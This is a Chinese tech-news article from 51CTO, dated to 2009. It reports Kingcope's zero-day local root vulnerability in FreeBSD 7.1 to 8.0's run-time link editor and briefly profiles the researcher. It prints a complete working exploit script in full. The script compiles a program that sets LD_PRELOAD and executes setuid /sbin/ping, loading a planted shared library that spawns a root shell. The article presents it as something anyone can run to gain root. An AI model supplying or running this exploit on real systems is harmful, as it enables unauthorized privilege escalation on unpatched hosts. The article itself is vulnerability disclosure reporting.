FreeBSD 7.1到8.0皆有漏洞 可获root权限堪称圣诞礼物

安全 系统
据Kingcope所说,他长期致力于挖掘FreeBSD系统的本地提权漏洞,终于有幸在近期发现了这个非常低级的本地提权漏洞;这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛,包括FreeBSD 7.1至8.0的32及64位系统。
在圣诞节即将到来的日子,以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日(0day)漏洞。据Kingcope所说,他长期致力于挖掘FreeBSD系统的本地提权漏洞,终于有幸在近期发现了这个非常低级的本地提权漏洞;这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛,包括FreeBSD 7.1至8.0的32及64位系统。

在展示该漏洞威力之前,我们科普一下著名黑客kingcope。从2007年6月至今,他一共公开了12个安全漏洞(没公开的不知道有多少),其中 FreeBSD和Sun Solaris各两个,微软四个,Oracle、mysql、NcFTPD和nginx各一个,同时他还编写了多个漏洞的攻击代码,例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。

接下来我们在最新的FreeBSD 8.0中重现一下该漏洞的攻击过程,请注意图中的红色部分;我们只要执行名为fbsd8localroot.sh的脚本,就可以轻易的获得root权限。

fbsd8localroot



相关脚本如下:

#!/bin/sh
echo “FreeBSD local r00t zeroday by Kingcope on November 2009″
cat > env.c << _EOF
#include
main() {
       extern char **environ;
       environ = (char**)malloc(8096);
       environ[0] = (char*)malloc(1024);
       environ[1] = (char*)malloc(1024);
       strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);
       execl(”/sbin/ping”, “ping”, 0);
}
_EOF
gcc env.c -o env > /dev/null 2>&1
#download from baoz.net
cat > program.c << _EOF
#include
#include
#include
#include
void _init() {
       extern char **environ;
       environ=NULL;
       system(”echo ALEX-ALEX;/bin/sh”);
}
_EOF
gcc -o program.o -c program.c -fPIC ; gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles ; cp w00t.so.1.0 /tmp/w00t.so.1.0 ;./env

FreeBSD尚未就该0day漏洞发布安全公告及官方补丁,敬请关注素包子的博客http://baoz.net/freebsd8-localroot-0day/以获取该漏洞的最新情况。

【编辑推荐】

  1. FreeBSD 7.1到8.0皆有漏洞 可获root权限堪称圣诞礼物
  2. FreeBSD下的强制访问控制体系 TrustedBSD MAC使用教程
  3. 应用防火墙的下一代
  4. 如何自己打造高性能宽带路由防火墙
  5. 提高管理与维护水平 企业网络防火墙管理经验谈
  6. 合理设置Vista系统防火墙让其独当一面
  7. 简单三步帮助企业解决Web业务安全防护问题
  8. 如何选择合适的Web安全网关
  9. Web准入认证—破除802.1x部署之争
  10. Web应用安全技巧
责任编辑:王文文 来源: 51CTO.com
相关推荐

2009-12-04 19:29:33

2020-12-25 07:54:23

Windows10操作系统漏洞

2014-12-22 11:10:06

LG

2015-12-28 10:17:36

2009-12-04 19:14:50

2009-11-26 10:52:55

LinuxChrome OS

2016-11-14 13:50:56

2009-12-25 10:01:12

谷歌员工

2019-12-30 12:15:53

戴尔

2018-12-25 23:46:33

开发者技能开源

2015-05-07 10:48:32

2019-12-19 17:20:31

程序员机器人语言

2024-10-23 15:58:17

2024-12-17 16:09:36

2021-07-21 20:24:29

Linux内核漏洞权限

2017-12-27 14:15:47

大数据数据分析圣诞

2019-12-26 16:49:20

华为

2010-06-23 10:03:01

2024-01-09 11:29:40

2011-12-19 20:05:36

iOS
点赞
收藏

51CTO技术栈公众号